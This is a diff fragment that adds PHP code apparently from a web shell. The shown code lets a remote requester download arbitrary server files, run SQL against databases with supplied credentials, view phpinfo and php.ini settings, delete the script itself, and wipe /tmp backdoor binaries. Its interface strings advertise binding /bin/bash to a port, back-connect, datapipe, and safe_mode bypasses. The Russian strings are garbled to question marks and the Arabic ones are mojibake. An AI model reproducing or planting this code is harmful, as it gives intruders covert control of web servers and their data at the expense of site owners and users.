+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'ÇáÇãÑ ÇáãäİĞ',
+'eng_text2' =>'ÊäİíĞ ÇáÇæÇãÑ İí ÇáÓíÑİÑ',
+'eng_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'eng_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑİÑ',
+'eng_text5' =>'ÑİÚ ãáİ Çáì ÇáÓíÑİÑ',
+'eng_text6' =>'ãÓÇÑ ãáİß',
+'eng_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'eng_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'eng_butt1' =>'ÊäİíĞ',
+'eng_butt2' =>'ÑİÜÚ',
+'eng_text9' =>'İÊÍ ÈæÑÊ İí ÇáÓíÑİÑ Úáì /bin/bash',
+'eng_text10'=>'ÈÜæÑÊ',
+'eng_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'eng_butt3' =>'İÊÍ',
+'eng_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'eng_text13'=>'ÇáÇí Èí',
+'eng_text14'=>'ÇáãäİĞ',
+'eng_butt4' =>'ÃÊÜÕÇá',
+'eng_text15'=>'ÓÍÈ ãáİÇÊ Çáì ÇáÓíÑİÑ',
+'eng_text16'=>'Úä ØÑíŞ',
+'eng_text17'=>'ÑÇÈØ Çáãáİ',
+'eng_text18'=>'ãßÇä äÒæáå',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'ÅÓÊÎÏã',
+'eng_text21'=>'&nbsp;ÇáÇÓã ÇáÌÏíÏ',
+'eng_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'eng_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'eng_text24'=>'ÇáÓíÑİÑ ÇáÈÚíÏ',
+'eng_text25'=>'ÇáãäİĞ ÇáÈÚíÏ',
+'eng_text26'=>'ÇÓÊÎÏã',
+'eng_butt5' =>'ÊÔÛíá',
+'eng_text28'=>'ÇáÚãá İí ÇáæÖÚ ÇáÇãä',
+'eng_text29'=>'ããäæÚ ÇáÏÎæá',
+'eng_butt6' =>'ÊÛíÑ',
+'eng_text30'=>'ÚÑÖ ãáİ',
+'eng_butt7' =>'ÚÑÖ',
+'eng_text31'=>'Çáãáİ ÛíÑ ãæÌæÏ',
+'eng_text32'=>'ÊäİíĞ ßæÏ php Úä ØÑíŞ ÏÇáå eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'ÇÎÊÈÇÑ',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'ÇáŞÇÚÏÉ . ÇáÌÏæá',
+'eng_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'eng_text38'=>'ßáãÉ ÇáãÑæÑ',
+'eng_text39'=>'ÇáŞÇÚÏÉ',
+'eng_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáŞÇÚÏÉ',
+'eng_butt9' =>'äÓÎÉ',
+'eng_text41'=>'ÍİÙ ÇáäÓÎÉ İí',
+'eng_text42'=>'ÊÚÏíá ÇáãáİÇÊ',
+'eng_text43'=>'Çáãáİ ÇáãÑÇÏ ÊÚÏíáå',
+'eng_butt10'=>'ÍİÙ',
+'eng_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åĞÇ Çáãáİ İŞØ ÊŞÑÃ',
+'eng_text45'=>'Êã ÇáÍİÙ',
+'eng_text46'=>'ÚÑÖ phpinfo()',
+'eng_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ İí php.ini',
+'eng_text48'=>'ãÓÍ ãáİÇÊ ÇáÜ temp',
+'eng_butt11'=>'ÊÍÑíÑ Çáãáİ',
+'eng_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑİÑ',
